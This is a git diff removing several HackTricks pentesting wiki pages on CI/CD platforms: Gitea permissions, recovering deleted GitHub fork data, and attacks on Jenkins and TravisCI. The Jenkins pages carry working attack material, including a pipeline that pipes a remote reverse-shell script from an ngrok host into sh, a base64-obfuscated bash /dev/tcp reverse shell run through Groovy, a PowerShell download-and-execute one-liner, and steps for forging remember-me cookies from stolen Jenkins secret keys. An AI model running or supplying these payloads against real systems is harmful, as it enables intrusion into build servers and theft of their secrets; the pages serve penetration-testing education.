- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md deleted file mode 100644 index b5daaad8e..000000000 --- a/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ /dev/null @@ -1,131 +0,0 @@ -# Basic Gitea Information - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Structure - -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. - -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. - -A user may also be **part of different teams** with different permissions over different repos. - -And finally **repositories may have special protection mechanisms**. - -## Permissions - -### Organizations - -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. - -**Org admins** (owners) can select the **visibility** of the organization: - -* Public -* Limited (logged in users only) -* Private (members only) - -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. - -When creating a new team, several important settings are selected: - -* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -* It's also indicated **if members can create new repos** (creator will get admin access to it) -* The **permissions** the **members** of the repo will **have**: - * **Administrator** access - * **Specific** access: - -![](<../../.gitbook/assets/image (118).png>) - -### Teams & Users - -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: - -* Administrator -* Write -* Read - -## Gitea Authentication - -### Web Access - -Using **username + password** and potentially (and recommended) a 2FA. - -### **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) - -#### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. - -### **Personal Access Tokens** - -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) - -### Oauth Applications - -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: - -![](<../../.gitbook/assets/image (194).png>) - -### Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. - -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. -{% endhint %} - -Different protections can be applied to a branch (like to master): - -* **Disable Push**: No-one can push to this branch -* **Enable Push**: Anyone with access can push, but not force push. -* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -* **Enable Status checks:** Require status checks to pass before merging. -* **Require approvals**: Indicate the number of approvals required before a PR can be merged. -* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -* **Block merge on official review requests**: If there official review requests it cannot be merged -* **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -* **Require Signed Commits**: Commits must be signed. -* **Block merge if pull request is outdated** -* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes - -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md deleted file mode 100644 index 392386866..000000000 --- a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md +++ /dev/null @@ -1,85 +0,0 @@ -# Accessible Deleted Data in Github - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). - -## Accessing Deleted Fork Data - -1. You fork a public repository -2. You commit code to your fork -3. You delete your fork - -{% hint style="danger" %} -The data commited in the deleted fork is still accessible. -{% endhint %} - -## Accessing Deleted Repo Data - -1. You have a public repo on GitHub. -2. A user forks your repo. -3. You commit data after they fork it (and they never sync their fork with your updates). -4. You delete the entire repo. - -{% hint style="danger" %} -Even if you deleted your repo, all the changes made to it are still accessible through the forks. -{% endhint %} - -## Accessing Private Repo Data - -1. You create a private repo that will eventually be made public. -2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. -3. You make your “upstream” repository public and keep your fork private. - -{% hint style="danger" %} -It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. -{% endhint %} - -## How to discover commits from deleted/hidden forks - -The same blog post propose 2 options: - -### Directly accessing the commit - -If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` - -### Brute-forcing short SHA-1 values - -It's the same to access both of these: - -* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) -* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) - -And the latest one use a short sha-1 that is bruteforceable. - -## References - -* [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md deleted file mode 100644 index 06ae83621..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md +++ /dev/null @@ -1,135 +0,0 @@ -# Jenkins Arbitrary File Read to RCE via "Remember Me" - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) - -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: - -### Attack Prerequisites - -* **Feature Requirement:** "Remember me" must be enabled (default setting). -* **Access Levels:** Attacker needs Overall/Read permissions. -* **Secret Access:** Ability to read both binary and textual content from key files. - -### Detailed Exploitation Process - -#### Step 1: Data Collection - -**User Information Retrieval** - -* Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - * **Username** - * **User seed** - * **Timestamp** - * **Password hash** - -**Secret Key Extraction** - -* Extract cryptographic keys used for signing the cookie: - * **Secret Key:** `$JENKINS_HOME/secret.key` - * **Master Key:** `$JENKINS_HOME/secrets/master.key` - * **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` - -#### Step 2: Cookie Forging - -**Token Preparation** - -* **Calculate Token Expiry Time:** - - {% code overflow="wrap" %} - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` - {% endcode %} -* **Concatenate Data for Token:** - - {% code overflow="wrap" %} - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` - {% endcode %} - -**MAC Key Decryption** - -* **Decrypt MAC Key File:** - - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` - -**Signature Computation** - -* **Compute HMAC SHA256:** - - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` - -**Cookie Encoding** - -* **Generate Final Cookie:** - - {% code overflow="wrap" %} - ```javascript - cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature) // Base64 encode the cookie data - ``` - {% endcode %} - -#### Step 3: Code Execution - -**Session Authentication** - -* **Fetch CSRF and Session Tokens:** - * Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - * Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. - -**Command Execution Request** - -* **Send a POST Request with Groovy Script:** - - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` - - * Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. - -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md deleted file mode 100644 index 34044c311..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md +++ /dev/null @@ -1,65 +0,0 @@ -# Jenkins RCE Creating/Modifying Pipeline - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Creating a new Pipeline - -In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** - -![](<../../.gitbook/assets/image (235).png>) - -In the **Pipeline section** write the **reverse shell**: - -![](<../../.gitbook/assets/image (285).png>) - -```groovy -pipeline { - agent any - - stages { - stage('Hello') { - steps { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh - ''' - } - } - } -} -``` - -Finally click on **Save**, and **Build Now** and the pipeline will be executed: - -![](<../../.gitbook/assets/image (228).png>) - -## Modifying a Pipeline - -If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md deleted file mode 100644 index b11c7dcb3..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md +++ /dev/null @@ -1,62 +0,0 @@ -# Jenkins RCE Creating/Modifying Project - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Creating a Project - -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). - -1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` - 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** - -![](<../../.gitbook/assets/image (165).png>) - -## Modifying a Project - -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): - -![](<../../.gitbook/assets/image (265).png>) - -If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). - -Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). - -## Execution - -If you are allowed to configure the project you can **make it execute commands when a build is successful**: - -![](<../../.gitbook/assets/image (98).png>) - -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md deleted file mode 100644 index 786f87325..000000000 --- a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md +++ /dev/null @@ -1,89 +0,0 @@ -# Jenkins RCE with Groovy Script - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Jenkins RCE with Groovy Script - -This is less noisy than creating a new project in Jenkins - -1. Go to _path\_jenkins/script_ -2. Inside the text box introduce the script - -```python -def process = "PowerShell.exe ".execute() -println "Found text ${process.text}" -``` - -You could execute a command using: `cmd.exe /c dir` - -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = '[INSERT COMMAND]'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in linux - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - -```python -scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" -echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc -``` - -### Script - -You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). - -You can use MSF to get a reverse shell: - -``` -msf> use exploit/multi/http/jenkins_script_console -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/todo.md b/pentesting-ci-cd/todo.md deleted file mode 100644 index 716bbecf1..000000000 --- a/pentesting-ci-cd/todo.md +++ /dev/null @@ -1,42 +0,0 @@ -# TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective - -* Drone -* TeamCity -* BuildKite -* OctopusDeploy -* Rancher -* Mesosphere -* Radicle -* Any other CI/CD platform... - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md deleted file mode 100644 index 9d14e9703..000000000 --- a/pentesting-ci-cd/travisci-security/README.md +++ /dev/null @@ -1,92 +0,0 @@ -# TravisCI Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## What is TravisCI - -**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. - -{% content-ref url="basic-travisci-information.md" %} -[basic-travisci-information.md](basic-travisci-information.md) -{% endcontent-ref %} - -## Attacks - -### Triggers - -To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: - -![](<../../.gitbook/assets/image (145).png>) - -#### Cron Jobs - -If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: - -![](<../../.gitbook/assets/image (243).png>) - -{% hint style="info" %} -It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). -{% endhint %} - -### Third Party PR - -TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: - -![](<../../.gitbook/assets/image (208).png>) - -### Dumping Secrets - -As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). - -* To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. -* To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. -* To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: - -![](<../../.gitbook/assets/image (81).png>) - -### TODO: - -* Example build with reverse shell running on Windows/Mac/Linux -* Example build leaking the env base64 encoded in the logs - -### TravisCI Enterprise - -If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: - -* escape to the host? -* compromise kubernetes? -* compromise other machines running in the same network? -* compromise new cloud credentials? - -## References - -* [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) -* [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
